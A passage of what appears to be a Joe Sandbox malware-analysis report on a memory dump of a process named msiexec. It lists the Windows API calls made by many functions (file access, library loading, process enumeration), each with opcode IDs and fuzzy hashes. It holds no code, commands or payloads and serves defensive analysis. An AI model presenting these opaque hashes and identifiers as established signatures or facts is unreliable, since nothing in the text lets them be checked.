                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmpmemset
                      • String ID:
                      • API String ID: 1065087418-0
                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                      APIs
                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                      • CloseHandle.KERNELBASE(?), ref: 00410654
                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                      • String ID:
                      • API String ID: 1381354015-0
                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                      APIs
                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$Time$CloseCompareCreateHandlememset
                      • String ID:
                      • API String ID: 2154303073-0
                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                      APIs
                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID:
                      • API String ID: 3150196962-0
                      • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                      • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                      APIs
                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$PointerRead
                      • String ID:
                      • API String ID: 3154509469-0
                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                      APIs
                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PrivateProfile$StringWrite_itowmemset
                      • String ID:
                      • API String ID: 4232544981-0
                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                      APIs
                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                      APIs
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$FileModuleName
                      • String ID:
                      • API String ID: 3859505661-0
                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                      APIs
                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                      APIs
                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                      APIs
                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                      APIs
                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                      APIs
                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                      APIs
                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                      APIs
                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: EnumNamesResource
                      • String ID:
                      • API String ID: 3334572018-0
                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                      APIs
                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                      APIs
                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: CloseFind
                      • String ID:
                      • API String ID: 1863332320-0
                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                      • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                      • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                      APIs
                      • memset.MSVCRT ref: 004095FC
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                        • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                        • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                      • String ID:
                      • API String ID: 3655998216-0
                      • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                      • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                      • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                      APIs
                      • memset.MSVCRT ref: 00445426
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                      • String ID:
                      • API String ID: 1828521557-0
                      • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                      • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                      • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                      APIs
                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                        • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@FilePointermemcpy
                      • String ID:
                      • API String ID: 609303285-0
                      • Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                      • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                      • Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
                      • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                      APIs
                        • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: File$CloseCreateErrorHandleLastRead
                      • String ID:
                      • API String ID: 2136311172-0
                      • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                      • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                      • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                      APIs
                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                      • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@??3@
                      • String ID:
                      • API String ID: 1936579350-0
                      • Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                      • Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free
                      • String ID:
                      • API String ID: 1294909896-0
                      • Opcode ID: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                      • Opcode Fuzzy Hash: 4de95ac81b56fc95cb4562d00445ef5fa655241d3aefb31a5f850866e19148c6
                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free
                      • String ID:
                      • API String ID: 1294909896-0
                      • Opcode ID: d947284d6c22db8237c76381862de6f07fb40d788dfda0aa2648abdb68a845b9
